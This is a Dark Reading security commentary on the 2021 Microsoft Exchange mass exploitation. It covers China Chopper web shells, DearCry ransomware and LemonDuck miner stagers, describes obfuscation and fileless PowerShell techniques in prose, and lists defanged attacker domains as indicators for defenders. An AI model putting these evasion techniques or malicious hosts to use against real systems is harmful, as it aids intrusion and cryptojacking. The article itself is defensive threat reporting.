Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

5/10/2021
10:00 AM
John Hammond
John Hammond
Commentary
Connect Directly
Twitter
LinkedIn
RSS
E-Mail vvv
50%
50%

Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.

Related Content:

Microsoft Exchange Server Attacks: 9 Lessons for Defenders

Special Report: Assessing Cybersecurity Risk in Today's Enterprises

New From The Edge: 10K Hackers Defend the Planet Against Extraterrestrials

On March 1, Huntress learned about new vulnerabilities that would offer an unauthorized actor full control of a Microsoft Exchange server. These vulnerabilities were not yet disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, it seemed Microsoft's initial announcement missed the mark.

What became dubbed as "Exchange Marauder," Microsoft originally described as "limited and targeted [in scope]," yet practically every version of Exchange was vulnerable, and these servers are publicly facing on the open Internet. While cloud servers were not affected and only on-premises installations of Exchange were susceptible to this attack, soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were unique files that would process and evaluate code on the server itself and allow anyone who knew the specific key or parameter to run commands and fully control the machine as an administrative user.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine if the initial patches that Microsoft released were in effect, and if there was presence of any Web shell, you were already compromised, and the patch wouldn't help. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax to run a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large amount of variations to these Web shells and have been archiving them here.)

Initially, these Web shells seemed to slip past most every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress
An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. Now, just about every AV and EDR product will get ahead of this. It does show, however, that this small, simple syntax slipped by and shook up the industry.

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? While the hackers have complete administrative access, they could drop ransomware, farm this machine into a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

More often than ransomware, surprisingly, is evidence of cryptocurrency miners. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a variable when requesting data from an external server. This gets around HTTP caching and ensures the content that is received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, which is obfuscated by using reversed strings. All of these techniques are attempts for this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the architecture of the victim, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it can continue to run on reboot and throttles the computer's resources to earn more money for the attacker.

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities against Exchange. Allegedly, these vulnerabilities have been exploited in the wild, but the impetus to patch should be the same as in March. Two of these new vulnerabilities don't require authentication and can be triggered without user interaction, ultimately gaining the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Edge-DRsplash-10-edge-articles
I Smell a RAT! New Cybersecurity Threats for the Crypto Industry
David Trepp, Partner, IT Assurance with accounting and advisory firm BPM LLP,  7/9/2021
News
Attacks on Kaseya Servers Led to Ransomware in Less Than 2 Hours
Robert Lemos, Contributing Writer,  7/7/2021
Commentary
It's in the Game (but It Shouldn't Be)
Tal Memran, Cybersecurity Expert, CYE,  7/9/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
How Enterprises are Attacking the Cybersecurity Problem
Concerns over supply chain vulnerabilities and attack visibility drove some significant changes in enterprise cybersecurity strategies over the past year. Dark Reading's 2021 Strategic Security Survey showed that many organizations are staying the course regarding the use of a mix of attack prevention and threat detection technologies and practices for dealing with cyber threats.
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2021-30315
PUBLISHED: 2021-10-20
Improper handling of sensor HAL structure in absence of sensor can lead to use after free in Snapdragon Auto
CVE-2021-30316
PUBLISHED: 2021-10-20
Possible out of bound memory access due to improper boundary check while creating HSYNC fence in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
CVE-2021-42739
PUBLISHED: 2021-10-20
The firewire subsystem in the Linux kernel through 5.14.13 has a buffer overflow related to drivers/media/firewire/firedtv-avc.c and drivers/media/firewire/firedtv-ci.c, because avc_ca_pmt mishandles bounds checking.
CVE-2021-1980
PUBLISHED: 2021-10-20
Possible buffer over read due to lack of length check while parsing beacon IE response in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, S...
CVE-2021-1983
PUBLISHED: 2021-10-20
Possible buffer overflow due to improper handling of negative data length while processing write request in VR service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables